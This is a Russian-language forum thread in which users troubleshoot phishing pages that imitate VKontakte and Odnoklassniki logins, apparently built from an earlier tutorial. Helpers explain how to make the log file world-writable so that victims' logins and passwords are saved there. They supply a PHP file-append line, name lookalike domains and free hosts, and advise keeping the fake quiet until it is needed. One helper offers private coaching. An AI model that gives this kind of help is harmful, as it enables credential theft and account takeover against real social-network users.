Отличная статья, жалко, что надо не только объяснять, но разжевывать некоторым индивидам, которые кричат о помощи даже не дочитав статью до конца))), хотя это простимо, сами были когда то такими... )))). ТС респект за труд... Когда я начинал, как то попросил у Zorgus помощи в решении одной проблемки, он не помог, мотивируя "учись догонять решение проблемы сам, анализируй". До сих пор ему за это благодарен... Новички, если что то не понимаете, попробуйте часика два поэкспериментировать, попытаться понять сам процесс, как это все работает, если уж и тогда не получится, тогда уже за помощью на ачат... Это вам же будет полезно.
Zerokko satana-fu Спасибо! Я всего-лишь опытный пользователь ПК. Все тонкости мне пока неизвестны/не понятны. Конечно, попытаюсь вникнуть во всё сам, но и рассчитываю на вашу помощь.
Хоть убейте, но не могу понять вот это: "создаем файил log.txt(советую свое уникальное имя придумать. не забудьте в скрипте сменить),ставим на него chmod777." И как залить всё полученное добро в созданный сайт на Holm.ru
Всё разобрался со всем, но не пашет нифига ( Следуя строго по инструкции я должен получить логин и пароль в файле log?
да, не забудь поставить на базу паролей разрешение 777, оно позволяет посетителям записывать в базу паролей данные из формы ввода (пароль, логин), то есть нажимая ВВОД жертва активирует файл скрипта и автоматом сам запишет свои пароли в твою базу. Мой совет, попробуй сделать эксперимент на freehostia.com, там полное описание всех разрешений. И еще, когда фейк будет готов, не спеши в порыве воодушевления рассылать его всем подряд, в таком случае ты портишь воздух сам себе, а то чем больше людей догонят что такое фейк, тем сложнее будет тебе его впарить потом, когда тебе это будет реально необходимо. фейки расчитанные на особо тупых и подобные http://vkontakhkte.ru или http://vkontacte.freehostia.com подпортят тебе в будущем малину )) поэтому будь осторожен. Если вообще внатак будет, стучись в асю после 8 вечера, помогу разобраться с фейком и объяснить значение каждой команды.
Спасибо satana-fu, но что-то не выходит... Сделал index и bad.htm с папками, скопировал скрипт (login) со скрина (просто скопировал скрипт в tht файл), создал log.tht засунул всё на сайт. Присвоил log.tht разрешение 777. Проблема в том что я не сделал login.tht в login.php? Если да то как это сделать? Просто переименовать?
После того как все готово открываеш блокнот ->сохранить как log.txt-> на маил который зареген твой сайт высылаться данные для FTP вот типо таких Контекнимся и заливаем это все в корневую папку и на фаил "log.txt" Выставляем права "chmod777"
Безрезультатно. Делаю для Одноклассников- ввожу лог, пасс, заходит на страничку. Но в log.tht ничего нету. В контакте даже ввести пароль и лог не получается, кнопка вход не реагирует.
да,заметил изменения в странице контактаф-по этому и не идет-в данный момент смотрю(вставили яву гандоны). как время будит-посмотрю
Привет.попытался сделать фейк одноклассников,залил на 000webhost.com .страница открывается,но когда вводишь логин и пароль вылазит вот ета ошибка Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /home/a7703566/public_html/login.php on line 2 Free Web Hosting PHP Error Message Parse error: syntax error, unexpected T_STRING in /home/a7703566/public_html/login.php on line 2 Free Web Hosting Что это ,подскажите пожалуйста???
сделай вот что. 1. проверь код в файле login.php $f=fopen("log.txt","at"); 2. проверь называется ли файл базы log.txt 3. проверь поставил ли ты на файл log.txt разрешение chmod777 После все должно заработать
jekascorp, кидай первые 4 строки, зачем гадать что у тебя там, просто засвети 2ю строчку и какое название базы, куда всё записывается.. вобщем, у тебя может быть 2 проблемы, либо название базы, либо у тебя неверно обрабатывается строка, где название форы упоминается и они не совпадают с именем в скрипте обработчика.. засвети всё и будет видно.